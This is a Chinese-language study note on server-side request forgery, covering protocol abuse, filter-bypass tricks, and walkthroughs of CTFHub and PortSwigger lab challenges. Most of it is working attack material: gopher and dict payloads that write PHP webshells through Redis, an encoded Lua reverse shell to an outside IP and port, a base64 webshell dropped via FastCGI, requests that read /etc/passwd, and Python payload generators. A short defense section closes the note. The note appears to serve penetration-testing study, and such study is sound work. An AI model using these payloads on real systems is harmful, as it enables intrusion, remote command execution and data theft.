SSRF

外部表现：Dnslog平台可以接收到服务器的请求，但是不是存在这种现象就代表存在漏洞，是否存在漏洞取决于能否利用，如有道词典https://fanyi.youdao.com/#/TextTranslate

是一种由攻击者构造形成由服务器端发起的请求的一个安全漏洞，URL可控

 1
 2
 3
 4
 5
 6
 7
 8
 9
10


轻则访问内网拓扑，网段，内网信息收集
高可getshell，文件读取

http://wooyun.2xss.cc/bug_detail.php?wybug_id=wooyun-2016-0223955  QQ空间SSRF漏洞
http://wooyun.2xss.cc/bug_detail.php?wybug_id=wooyun-2016-0215779  小米SSRF漏洞
http://wooyun.2xss.cc/bug_detail.php?wybug_id=wooyun-2016-0214331  华为SSRF漏洞
http://wooyun.2xss.cc/bug_detail.php?wybug_id=wooyun-2016-0214261  有道SSRF漏洞绕过
1.http://10.100.21.7.xip.io
2.http://www.10.100.21.7.xip.name
3.http://t.im/14tjq

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11


<?php
  function curl($url){
  $ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_exec($ch);
curl_close($ch);
}
$url = $_GET['url'];
curl($url);
?>

对于SSRF类漏洞首先需要先尝试协议，看那种协议能够正常使用

发现网站疑似存在SSRF漏洞先判断网站是否在云上，在云上可以尝试获取元数据

SSRF半自动化挖掘

SSRF-King

https://github.com/ethicalhackingplayground/ssrf-king

直接扩展导入Jar包，在仪表盘中将扫描范围设置成如下图所示

Burp扫描配置—扫描设定里面

collaborator-everywhere

bp开启拦截他会自动添加参数

SSRF漏洞深度利用

注意：SSRF利用伪协议攻击内网IP时需要对数据进行URL二次编码，防止特殊个数数据影响执行和传输

https://blog.csdn.net/csjjjd/article/details/140654737

如果Dnslog地址能够成功获取到请求，表明服务器支持上述协议，如何判断SSRF是有回显SSRF还是无回显SSRF，只需要插入对应网站，查看网页能否正常加载

http协议

1
2
3
4


http://111.229.71.77/vul/ssrf/ssrf_curl.php?url=http://mk1d.callback.red

#探测内网192.168.10.1上3306端口，如果开放会有对应反馈
http://111.229.71.77/vul/ssrf/ssrf_curl.php?url=http://192.168.10.1:3306   

如果想批量探测内网存活端口，只需要使用Burp的Intruder模块进行爆破

1
2
3
4
5
6
7
8
9


GET /vul/ssrf/ssrf_curl.php?url=http://127.0.0.1:3306 HTTP/1.1
Host: 111.229.71.77
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://111.229.71.77/vul/ssrf/ssrf_curl.php
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

dict协议

字典服务器协议，访问字典资源。对传入的后缀文件有大小现限制。探测内网端口和服务一般使用http和dict协议，dict协议本身能够发送数据，dict协议扫描端口速度快

1
2
3
4
5


http://111.229.71.77/vul/ssrf/ssrf_curl.php?url=dict://fc8k.callback.red

http://111.229.71.77/vul/ssrf/ssrf_curl.php?url=dict://127.0.0.1:22

http://111.229.71.77/vul/ssrf/ssrf_curl.php?url=dict://ip:6739/info

使用dict探测端口是否开放，如果目标网站开放端口，会返回端口所提供的服务的部分组件信息

如果目标端口关闭则不会产生任何提示

写Webshell

1
2
3
4
5
6
7
8
9


dict://192.168.0.100:6379/flushall             //更新
dict://192.168.0.100:6379/config:set:dir:/var/www/html       //设置webshell上传路径
dict://192.168.0.100:6379/config:set:dbfilename:webshell.php   //设置写入文件
dict://192.168.0.100:6379/set:webshell:"123456"               //设置写入内容，最后将内容进行编码，否则容易乱码
dict://192.168.0.100:6379/set:webshell:"十六进制一句话木马"
dict://192.168.0.100:6379/save                              //保存

dict://192.168.0.100:6379/keys *                  //查看写入的文件
dict://192.168.0.100:6379/get webshell

file协议

从文件中获取目标服务器的文件内容，不支持Dnslog回显

1
2
3
4
5
6


http://111.229.71.77/vul/ssrf/ssrf_curl.php?url=file:///etc/passwd
http://111.229.71.77/vul/ssrf/ssrf_curl.php?url=file:///var/www/html/flag.php

file:///etc/hosts    #显示当前操作系统网卡的IP
file:///proc/net/arp   #显示arp缓存表(寻找内网其他主机)
file:///proc/net/fib_trie   #显示当前网段路由信息

Gopher协议

https://zhuanlan.zhihu.com/p/112055947 gopher协议详解

https://github.com/tarunkant/Gopherus 工具项目地址

https://github.com/firebroo/sec_tools/tree/master/redis-over-gopher 工具

https://blog.csdn.net/weixin_39633252/article/details/113229123 ssrf攻击内网mysql

分布式文档传递服务，可传入data

1

http://111.229.71.77/vul/ssrf/ssrf_curl.php?url=gopher://mq9c.callback.red

Gopher协议攻击内网Redis

方案1：写Webshell

1
2
3
4
5
6
7
8


攻击前提：redis弱密码或无密码
知道网站根目录
目录有写入权限

python2 gopherus.py --exploit redis

gopher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2434%0D%0A%0A%0A%3C%3Fphp%20system%28%24_GET%5B%27cmd%27%5D%29%3B%20%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2413%0D%0A/var/www/html%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A
生成后的payload最好在做一次url编码，从下划线开始

方案2：计划任务反弹shell

方案3：写lua脚本getshell

Lua项目下SSRF利用Redis文件覆盖lua回显RCE

1
2


##LUA_START##os.execute("/bin/bash -c 'sh -i %26>/dev/tcp/120.24.186.57/1234 
0>%261'")##LUA_END##

那么可以通过gopher协议覆盖/scripts/visit.script⽂件，写⼊lua代码去反弹shell

1
2
3
4
5
6
7


gopher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%
0A%241%0D%0A1%0D%0A%24101%0D%0A%0A%0A%23%23LUA_START%23%23os.execute%28%22/bin/bash%20
-c%20%27sh%20-
i%20%26%3E/dev/tcp/120.24.186.57/1234%200%3E%261%27%22%29%23%23LUA_END%23%23%0A%0A%0D%
0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%248%0D%0A/scr
ipts%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%
0A%2412%0D%0Avisit.script%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A

ldap协议

轻量级目录访问协议

1

http://111.229.71.77/vul/ssrf/ssrf_curl.php?url=ldap://jndi.callback.red:5/in4y/

tftp协议

1

http://111.229.71.77/vul/ssrf/ssrf_curl.php?url=tftp://xxx.callback.red

绕过方法

https://mp.weixin.qq.com/s/p1ldAOlQ_gVB3w1bm0lQ7g

SSRF漏洞特征在于请求包中存在url地址，这些特征会引起Waf/态势感知设备的告警

1
2
3


#使用字符拼接进行绕过
http://192.168.0.102/ssrf.php?url=http://192.168.0.100.sslip.io:22
http://192.168.0.102/ssrf.php?url=http://hahahahhahahhah.la12.callback.red

环回地址绕过

1
2
3
4
5
6
7


环回地址绕过：
http://[::1]
http:/[::]
http://[::]:8o/
http://g000::1:80/
http://127.1
http://0

进制绕过

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15


/点分十进制
127.0.0.1
//八进制（也可以加点）
0177000000001
http://0000::1:80/
0177.886.000.801
/十六进制
0x7F000001
0x7F.0x00.0x00.0x01
0x7F.00.00.01
/十进制
2130706433
//二进制
0b01111111000000000000000000000001
locathost

黑名单编码绕过

302重定向绕过

1

http://challenge-4d170753d38888ec.sandbox.ctfhub.com:10800/?url=http://www.baidu.com@0x7F.00.00.01/flag.php

url参数滥用绕过（@/#）

1
2


# ---> url编码%23 --->双url编码%2523
@

DNS重绑定

https://lock.cmpxchg8b.com/rebinder.html DNS重绑定在线网址

https://zhuanlan.zhihu.com/p/89426041 浅谈DNS重绑定漏洞

SSRF漏洞加固防御

1
2
3


将一些不用的协议禁止加入黑名单：dict,file,gopher,tftp...
内网IP设置白名单
端口IP限制，内网高危端口22，3306，6379限制

CTF中SSRF漏洞常规利用

https://www.ctfhub.com/#/skilltree CTF在线SSRF漏洞利用

https://www.nssctf.cn/problem/2011

https://www.cnblogs.com/lhqrusht0p/p/18017007

填写需要curl的网站会直接跳转到网站首页，使用DNSlog进行探测，发现存在回显

对网站进行伪协议攻击,发现可以使用file伪协议

读取flag，提示存在ha1x1ux1u.php文件

访问该文件，进行代码审计，还是个存在SSRF漏洞的代码

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12


<?php

  highlight_file(__FILE__);
error_reporting(0);

$file = $_GET["file"];
if (stristr($file, "file")){
  die("你败了.");
}

//flag in /flag
echo file_get_contents($file); 

[Hitcon 2017]SSRFme

https://blog.csdn.net/qq_59471040/article/details/144250739

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31


<?php
// 如果存在HTTP_X_FORWARDED_FOR头，则获取X-Forwarded-For头的内容
if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
    $http_x_headers = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
    // 将第一个IP地址设置为REMOTE_ADDR，这可能导致IP伪造
    $_SERVER['REMOTE_ADDR'] = $http_x_headers[0];
}
 
// 输出当前的REMOTE_ADDR，即用户的真实IP地址
echo $_SERVER["REMOTE_ADDR"];
 
// 根据用户IP和固定字符串创建一个目录名，并尝试创建这个目录
$sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]);
@mkdir($sandbox);
@chdir($sandbox);
 
// 执行一个GET请求，获取用户指定URL的内容，并将其赋值给$data变量
// 这里存在一个命令注入的风险，因为$data变量直接用于shell_exec函数
$data = shell_exec("GET " . escapeshellarg($_GET["url"]));
// 获取用户指定文件名的路径信息
$info = pathinfo($_GET["filename"]);
// 将路径中的点（.）替换为空，这可能是为了防止创建带有点的目录
$dir  = str_replace(".", "", basename($info["dirname"]));
// 创建目录并进入该目录
@mkdir($dir);
@chdir($dir);
// 将获取的数据保存为文件，文件名为用户指定的文件名
@file_put_contents(basename($info["basename"]), $data);
// 高亮显示当前文件的代码，这通常用于调试
highlight_file(__FILE__);
?>

CTFHub—POST请求—考点gopher协议发送post请求

https://mp.weixin.qq.com/s/ElNAouUg0jpRhfgeE8zRkw

题目描述：****这次是发一个HTTP POST请求.对了.ssrf是用php的curl实现的.并且会跟踪302跳转.加油吧骚年

先尝试协议，看哪些协议能够支持，读取index.php文件

读取flag.php文件

使用gopher发送请求

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15


import urllib.parse
payload =\
"""POST /flag.php HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 36

key=86a31efba632022b9e1883caa06858a9 
"""  
#注意后面一定要有回车，回车结尾表示http请求结束
tmp = urllib.parse.quote(payload)
new = tmp.replace('%0A','%0D%0A')
result = 'gopher://127.0.0.1:80/'+'_'+new
result = urllib.parse.quote(result)
print(result)

这个生成的payload最好二次url编码一下

1
2
3
4
5
6
7
8
9


GET /?url=gopher%3A//127.0.0.1%3A80/_%250D%250APOST%2520/flag.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250AContent-Length%253A%252036%250D%250A%250D%250Akey%253D86a31efba632022b9e1883caa06858a9%2520%250D%250A HTTP/1.1
Host: challenge-c77475fa1b5a0319.sandbox.ctfhub.com:10800
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
Priority: u=0, i

CTFHub—上传文件

https://mp.weixin.qq.com/s/d2r8JHUisxhhARLl3b-Yrg

访问flag.php,上传文件抓取数据包，没用提交按钮，需要修改html代码

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24


POST /flag.php HTTP/1.1
Host: challenge-69b96492ff78395b.sandbox.ctfhub.com:10800
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------199908452239551894662987264031
Content-Length: 350
Origin: http://challenge-69b96492ff78395b.sandbox.ctfhub.com:10800
Connection: close
Referer: http://challenge-69b96492ff78395b.sandbox.ctfhub.com:10800/?url=file:///var/www/html/flag.php
Upgrade-Insecure-Requests: 1
Priority: u=0, i

-----------------------------199908452239551894662987264031
Content-Disposition: form-data; name="file"; filename=""
Content-Type: application/octet-stream


-----------------------------199908452239551894662987264031
Content-Disposition: form-data; name="submit"

提交查询
-----------------------------199908452239551894662987264031--

将代码使用python脚本生成payload

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33


import urllib.parse
payload =\
"""POST /flag.php HTTP/1.1
Host: challenge-69b96492ff78395b.sandbox.ctfhub.com:10800
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------199908452239551894662987264031
Content-Length: 350
Origin: http://challenge-69b96492ff78395b.sandbox.ctfhub.com:10800
Connection: close
Referer: http://challenge-69b96492ff78395b.sandbox.ctfhub.com:10800/?url=file:///var/www/html/flag.php
Upgrade-Insecure-Requests: 1
Priority: u=0, i

-----------------------------199908452239551894662987264031
Content-Disposition: form-data; name="file"; filename=""
Content-Type: application/octet-stream


-----------------------------199908452239551894662987264031
Content-Disposition: form-data; name="submit"

提交查询
-----------------------------199908452239551894662987264031--
"""  
#注意后面一定要有回车，回车结尾表示http请求结束
tmp = urllib.parse.quote(payload)
new = tmp.replace('%0A','%0D%0A')
result = 'gopher://127.0.0.1:80/'+'_'+new
result = urllib.parse.quote(result)
print(result)

1
2
3
4
5
6
7
8
9


GET /?url=gopher%3A//127.0.0.1%3A80/_POST%2520%252Fflag.php%2520HTTP%252F1.1%250D%250AHost%253A%2520challenge-fdbaeb80bf490fcb.sandbox.ctfhub.com%253A10800%250D%250AUser-Agent%253A%2520Mozilla%252F5.0%2520(Windows%2520NT%252010.0%253B%2520Win64%253B%2520x64%253B%2520rv%253A92.0)%2520Gecko%252F20100101%2520Firefox%252F92.0%250D%250AAccept%253A%2520text%252Fhtml%252Capplication%252Fxhtml%252Bxml%252Capplication%252Fxml%253Bq%253D0.9%252Cimage%252Fwebp%252C*%252F*%253Bq%253D0.8%250D%250AAccept-Language%253A%2520zh-CN%252Czh%253Bq%253D0.8%252Czh-TW%253Bq%253D0.7%252Czh-HK%253Bq%253D0.5%252Cen-US%253Bq%253D0.3%252Cen%253Bq%253D0.2%250D%250AAccept-Encoding%253A%2520gzip%252C%2520deflate%250D%250AContent-Type%253A%2520multipart%252Fform-data%253B%2520boundary%253D---------------------------3899987496969232395467070377%250D%250AContent-Length%253A%2520388%250D%250AOrigin%253A%2520http%253A%252F%252Fchallenge-fdbaeb80bf490fcb.sandbox.ctfhub.com%253A10800%250D%250AConnection%253A%2520close%250D%250AReferer%253A%2520http%253A%252F%252Fchallenge-fdbaeb80bf490fcb.sandbox.ctfhub.com%253A10800%252F%253Furl%253D127.0.0.1%252Fflag.php%250D%250ACookie%253A%2520UM_distinctid%253D17bedb2040d988-0aed78614d6fec8-4c3e2778-144000-17bedb2040ff22%250D%250AUpgrade-Insecure-Requests%253A%25201%250D%250A%250D%250A-----------------------------3899987496969232395467070377%250D%250AContent-Disposition%253A%2520form-data%253B%2520name%253D%2522file%2522%253B%2520filename%253D%25221.php%2522%250D%250AContent-Type%253A%2520application%252Foctet-stream%250D%250A%250D%250AGIF89a%253C%253Fphp%250D%250A%2540eval(%2524_POST%255B'pass'%255D)%253B%250D%250A%253F%253E%250D%250A-----------------------------3899987496969232395467070377%250D%250AContent-Disposition%253A%2520form-data%253B%2520name%253D%2522submit%2522%250D%250A%250D%250A%25E6%258F%2590%25E4%25BA%25A4%25E6%259F%25A5%25E8%25AF%25A2%250D%250A-----------------------------3899987496969232395467070377-- HTTP/1.1
Host: challenge-5b46f441c84cf0b2.sandbox.ctfhub.com:10800
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
Priority: u=0, i

CTFHub—FastCGI协议

首先要了解Fastcgi协议是什么，这里可以参考下文章

https://segmentfault.com/a/1190000013112052

https://blog.csdn.net/mysteryflower/article/details/94386461

**CGI**协议的诞生是为了解决**HTTP**协议与编程语言之间的连接问题，从而减低动态页面的开发难度。这个协议避免所有的编程语言开发动态页面时还需要开发一套**HTTP**的解析库。

**Fastcgi**程序将**CGI**程序的规范都进行了保留，并将其升级，主要是将输入和输出的方式从标准流迁移到了**socket**传输，同时，**fastcgi**协议也支持将**cgi**程序进行守护进程化，这样可以提高请求的处理速度，同时提高了稳定性。

解题思路使用Gopherus进行文件上传getshell后查看

1
2
3


python2 gopherus.py --exploit fastcgi

echo PD9waHAgQGV2YWwoJFBPU1RfWydjbWQnXSk7Pz4= | base64 -d > /var/www/html/shell.php

读取文件，成功上传

BurpSuite官方SSRF靶场通关思路

https://portswigger.net/web-security/all-labs 靶场地址

https://portswigger.net/web-security/ssrf WP地址

https://mp.weixin.qq.com/s/ZUFS8ISQv8qm0iCEB0sh6Q

针对本地服务器的基本 SSRF

SSRF存在位置：点击商品—查看库存

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18


POST /product/stock HTTP/2
Host: 0a96007e04d5516c803044a8008d00b4.web-security-academy.net
Cookie: session=drqHd3J1bQVeABCIsr8xlErWiXY0x73M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Referer: https://0a96007e04d5516c803044a8008d00b4.web-security-academy.net/product?productId=14
Content-Type: application/x-www-form-urlencoded
Content-Length: 60
Origin: https://0a96007e04d5516c803044a8008d00b4.web-security-academy.net
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

stockApi=http://479j8u31i27ddn59ua2qf3b6kxqoeg25.oastify.com

网站要求删除**carlos用户，此时将url地址替换为**http://localhost/admin即可访问

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18


POST /product/stock HTTP/2
Host: 0a96007e04d5516c803044a8008d00b4.web-security-academy.net
Cookie: session=drqHd3J1bQVeABCIsr8xlErWiXY0x73M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Referer: https://0a96007e04d5516c803044a8008d00b4.web-security-academy.net/product?productId=14
Content-Type: application/x-www-form-urlencoded
Content-Length: 31
Origin: https://0a96007e04d5516c803044a8008d00b4.web-security-academy.net
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

stockApi=http://localhost/admin

直接点击删除用户会显示未授权访问，此时还是利用SSRF进行删除

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18


POST /product/stock HTTP/2
Host: 0a96007e04d5516c803044a8008d00b4.web-security-academy.net
Cookie: session=w2V91qXGsTAuF7nuW4iq0X7Egrs13gt3; session=drqHd3J1bQVeABCIsr8xlErWiXY0x73M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Referer: https://0a96007e04d5516c803044a8008d00b4.web-security-academy.net/product?productId=14
Content-Type: application/x-www-form-urlencoded
Content-Length: 60
Origin: https://0a96007e04d5516c803044a8008d00b4.web-security-academy.net
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

stockApi=http%3A%2F%2Flocalhost/admin/delete?username=carlos

针对内网其它服务器的SSRF

漏洞存在位置和6.1一样，也是存在点击商品—查看库存

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18


POST /product/stock HTTP/2
Host: 0a9a00ff04ae70da8260a14a00920027.web-security-academy.net
Cookie: session=0RAnL6L1oPU3KBaGc15zbk7fpDtPRvT4
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Referer: https://0a9a00ff04ae70da8260a14a00920027.web-security-academy.net/product?productId=2
Content-Type: application/x-www-form-urlencoded
Content-Length: 96
Origin: https://0a9a00ff04ae70da8260a14a00920027.web-security-academy.net
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

stockApi=http%3A%2F%2F192.168.0.1%3A8080%2Fproduct%2Fstock%2Fcheck%3FproductId%3D2%26storeId%3D1

题目描述内网IP：192.168.0.某台主机开放8080端口，需要使用该台主机删除用户*carlos**

对目标主机IP地址进行爆破，发现内网192.168.0.110开放8080端口

访问/admin目录成功进入管理员后台

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18


POST /product/stock HTTP/2
Host: 0a9a00ff04ae70da8260a14a00920027.web-security-academy.net
Cookie: session=0RAnL6L1oPU3KBaGc15zbk7fpDtPRvT4
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Referer: https://0a9a00ff04ae70da8260a14a00920027.web-security-academy.net/product?productId=2
Content-Type: application/x-www-form-urlencoded
Content-Length: 69
Origin: https://0a9a00ff04ae70da8260a14a00920027.web-security-academy.net
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

stockApi=http%3A%2F%2F192.168.0.110:8080/admin/delete?username=carlos

成功删除carlos用户

****带外检测的盲 SSRF

题目描述：要解决实验问题，请使用此功能向公共 Burp Collaborator 服务器发出 HTTP 请求。

存在漏洞点在http请求中的referer字段，将referer字段url填写为BP的Collaborator模块即可解决问题

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15


GET /product?productId=14 HTTP/2
Host: 0a60008b0446597680c95d4900e500ae.web-security-academy.net
Cookie: session=8ukvsS5poaa36dDRTFMKqjGnJdEaQGpU
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Referer: http://w415tlzzvtbm4yb6vny5qnh1psvjja7z.oastify.com
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

具有基于黑名单的输入过滤器的 SSRF

题目描述和6.1&6.2一样，需要删除carlos用户

漏洞点也是存在****点击商品—查看库存

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18


POST /product/stock HTTP/2
Host: 0a90006d03eb0af084a0223400ef0026.web-security-academy.net
Cookie: session=P6vpudOBS7THYsWjfEXNgrzNq5cLydrf
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Referer: https://0a90006d03eb0af084a0223400ef0026.web-security-academy.net/product?productId=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 37
Origin: https://0a90006d03eb0af084a0223400ef0026.web-security-academy.net
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

stockApi=http%3A%2F%2F127.0.0.1/admin

但是过滤了，不让直接访问内网IP，Bypass

1
2


环回地址绕过成功
进制绕过失败

但是添加目录又不行

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18


POST /product/stock HTTP/2
Host: 0ab4001b0453b37d8007358b00d10042.web-security-academy.net
Cookie: session=9wniPsfLjEOpp8Q2paREt6txQpEUVq4l
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Referer: https://0ab4001b0453b37d8007358b00d10042.web-security-academy.net/product?productId=2
Content-Type: application/x-www-form-urlencoded
Content-Length: 33
Origin: https://0ab4001b0453b37d8007358b00d10042.web-security-academy.net
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

stockApi=http%3A%2F%2F127.1/admin

对目录进行编码绕过，将"a"进行双URL编码为%2561

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18


POST /product/stock HTTP/2
Host: 0ab4001b0453b37d8007358b00d10042.web-security-academy.net
Cookie: session=9wniPsfLjEOpp8Q2paREt6txQpEUVq4l
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Referer: https://0ab4001b0453b37d8007358b00d10042.web-security-academy.net/product?productId=2
Content-Type: application/x-www-form-urlencoded
Content-Length: 31
Origin: https://0ab4001b0453b37d8007358b00d10042.web-security-academy.net
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

stockApi=http://127.1/%2561dmin

通过开放重定向漏洞绕过过滤器的 SSRF

要解决实验问题，请更改库存检查 URL 以访问 Admin 界面， **<font style="color:rgb(92, 92, 91);">http://192.168.0.12:8080/admin</font>** 并删除用户 **<font style="color:rgb(92, 92, 91);">carlos</font>**。

漏洞功能点：查看详细商品—Next Product

单击"next product"并观察到path参数被放置到重定向响应的Location头中，从而导致打开重定向

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15


GET /product/nextProduct?currentProductId=2&path=/product?productId=3 HTTP/2
Host: 0a0f0008049d3117812cc0eb009f0017.web-security-academy.net
Cookie: session=RvsFc32IvjozAi9Jpn0NpcGGO4j2jiwi; session=8c8YpHoJxmnNr0eT0cYNc7C6ztfCLxn7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Referer: https://0a0f0008049d3117812cc0eb009f0017.web-security-academy.net/product?productId=2
Upgrade-Insecure-Requests: 1
